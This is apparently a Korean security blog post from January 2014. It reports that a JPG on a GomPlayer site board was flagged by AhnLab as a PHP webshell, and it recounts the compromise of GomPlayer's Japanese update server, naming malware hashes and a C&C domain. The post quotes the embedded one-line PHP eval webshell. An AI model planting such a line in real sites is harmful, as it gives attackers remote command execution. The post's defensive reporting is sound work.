본문 바로가기

벌새::Security

곰플레이어 게시판에서 발견된 PHP/Webshell 진단 이슈와 보안 문제 (2014.1.26)

728x90
반응형

최근 그래텍(Gretech)에서 제공하는 곰플레이어(GomPlayer) 홈 페이지 내의 특정 게시판에 접속할 경우 AhnLab V3 보안 제품에서 PHP/Webshell 진단명으로 진단되는 이슈가 발생하고 있는 것으로 알려지고 있습니다.

개인적으로 해당 웹 사이트 및 게시판을 거의 확인하지 않았던 관계로 언제부터 해당 이슈가 발생하고 있었는지는 알 수 없지만, 다음과 같은 문제로 인하여 특정 JPG 그림 파일에 대한 진단이 이루어지고 있습니다.

곰플레이어 자료실의 "로고화면 자료실"에 접속해보면 게시판에 등록된 그림 파일이 자동으로 노출이 이루어지며, 2011년 10월 7일에 등록되었다고 표시되는 2개의 게시글(gggggggggggg, ffffffffffffffffff)에 포함된 동일한 그림 파일(SHA-1 : 2901f3703c717876468a5eab37f6edb46cc3a4db)을 AhnLab V3 보안 제품에서 PHP/Webshell (VT : 3/50) 진단명으로 진단하고 있습니다.

 

흥미로운 점은 이전의 정상적인 게시글의 경우에는 정상적인 제목과 그림 파일이 표시되는 반면, 문제의 2개의 글은 로고(Logo)로 사용할 수 없는 그림과 의미없는 제목을 포함하고 있습니다.

 

특히 바로 아래에 작성한 등록일(2011년 7월 10일)을 참조하여 "2011년 10월 7일"로 등록일자를 조작하였을 가능성도 존재하며, 실제 해당 게시글은 최근에 등록되어 있는 것이 아닌가 의심이 됩니다.

진단이 이루어지고 있는 JPG 그림 파일을 확인해보면 "<?php eval($_POST[cmd]?>"와 같은 웹셀(Webshell) 명령어가 등록되어 있는 것을 확인할 수 있으며, 이를 통해 외부에서 명령에 따라 악의적인 행위를 할 수 있지 않을까도 생각됩니다.

 

그러므로 사용자가 게시판에 업로드할 수 있는 기능을 제공할 때에는 첨부 파일에 대한 보안 검증이 매우 필요할 것으로 보이며, 최근 일본(Japan)에서 발생한 곰플레이어(GomPlayer) 업데이트 기능을 통한 악성코드 유포에 대한 소식도 함께 전해 드리겠습니다.

  <교도통신사> "곰플레이어 업데이트시 바이러스 감염"…日 정부기관, 비상 (2014.1.24)

 

  <Gretech Japan : 곰플레이어> 一部報道に対する弊社の見解について(1月24日更新) (2014.1.23)

 

  <Gretech Japan : 곰플레이어> 報道に対する弊社からのお詫びとお知らせ (2014.1.24)

 

사건의 발단은 2013년 12월 27일~2014년 1월 16일까지 미국(USA)에 위치한 곰플레이어(GomPlayer) 업데이트 서버(app.gomlab.com)가 외부 해킹에 의하여 무단 접속이 이루어졌으며, 이를 통해 곰플레이어 일본어 버전 사용자의 경우 업데이트 기능을 통해 악성 파일을 설치하도록 유도하였을 것으로 보입니다.

 

알려진 당시 업데이트 파일(GOMPLAYERJPSETUP.EXE - SHA-1 : 295b91daa7e7cbf61ced13eaeb074356ea64de8e)에 대하여 Symantec 보안 제품에서는 Backdoor.Miancha 진단명으로 진단이 이루어지고 있습니다.(Hauri ViRobot : Dropper.S.Agent.13442065, nProtect : Trojan/W32.FakeGom.13314, Trojan/W32.FakeGom.13442065, Trojan/W32.FakeGom.285158)

 

시스템 감염이 이루어진 환경에서는 443 포트를 통해 원격 서버(testqweasd.tk)와 통신을 시도하여, 피해자 PC의 시스템 정보를 전송하며 추가적인 악성 파일들을 다운로드하는 것으로 알려져 있습니다.

 

특히 원격 서버(C&C 서버)가 한국 IP를 사용하고 있었던 것으로 알려지고 있으며, 감염시 일본 원자력 관련 기관만을 대상으로 감염시켰던 것으로 보아 표적 공격을 통해 원자력 관련 정보 유출을 시도할 목적으로 보입니다.

 

이에 따라 2014년 1월 16일 곰플레이어(GomPlayer) 업데이트 서버 설정 변경 및 보안 강화 조치가 이루어졌으며, 2014년 1월 23일 곰플레이어(GomPlayer)를 비롯한 기타 곰소프트웨어 업데이트 서비스 모두를 일시 중지한 상태입니다.

이처럼 최근 그래텍(Gretech) 소프트웨어의 보안 이슈가 국내외에서 발생하고 있으므로 제품 사용자들은 공식 홈 페이지에서 제공하는 설치 파일만을 이용하시 바라며, 다운로드한 파일의 디지털 서명 여부를 반드시 체크하여 유효하지 않은 서명이 포함되어 있거나 디지털 서명이 없는 파일은 실행하지 않도록 하시기 바랍니다.

728x90
반응형